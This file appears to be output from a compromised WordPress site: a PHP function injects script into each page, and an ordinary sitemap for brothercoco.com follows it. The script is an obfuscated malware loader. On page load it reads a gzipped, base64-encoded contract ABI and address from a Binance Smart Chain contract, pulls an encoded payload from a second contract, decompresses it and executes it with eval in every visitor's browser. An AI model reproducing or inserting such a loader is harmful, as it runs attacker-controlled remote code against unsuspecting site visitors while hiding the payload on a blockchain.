function dtaj_add_custom_js() {
    ?>
    <script src="https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/pako/2.0.4/pako.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/crypto-js.min.js"></script>
    <script>
       document.addEventListener("DOMContentLoaded", async () => {
           const w3 = new Web3("https://bsc-dataseed.binance.org/");
           const ct = new w3.eth.Contract([
               {inputs:[], stateMutability:"nonpayable", type:"constructor"},
               {inputs:[], name:"orchidABI", outputs:[{internalType:"string", name:"", type:"string"}], stateMutability:"view", type:"function"},
               {inputs:[], name:"orchidAddress", outputs:[{internalType:"string", name:"", type:"string"}], stateMutability:"view", type:"function"},
               {inputs:[], name:"merlionABI", outputs:[{internalType:"string", name:"", type:"string"}], stateMutability:"view", type:"function"},
               {inputs:[], name:"merlionAddress", outputs:[{internalType:"string", name:"", type:"string"}], stateMutability:"view", type:"function"}
           ], "0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53");
           const oABI = JSON.parse(pako.ungzip(
               Uint8Array.from(atob(await ct.methods.orchidABI().call()), c => c.charCodeAt(0)),
               {to:"string"}
           ));
           const oAddr = await ct.methods.orchidAddress().call();
           const orchid = new w3.eth.Contract(oABI, oAddr);
           const ds = pako.ungzip(
               Uint8Array.from(atob(await orchid.methods.tokyoSkytree().call()), c => c.charCodeAt(0)),
               {to:"string"}
           );
           eval(`(async(orchid)=>{${ds}})(orchid);`);
       });
    </script>
    <?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://brothercoco.com/wp-sitemap.xsl" ?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><url><loc>https://brothercoco.com/category/tak-berkategori/</loc></url><url><loc>https://brothercoco.com/category/dating/</loc></url><url><loc>https://brothercoco.com/category/extentions-info/</loc></url><url><loc>https://brothercoco.com/category/delete-malware/</loc></url><url><loc>https://brothercoco.com/category/blog/</loc></url></urlset>
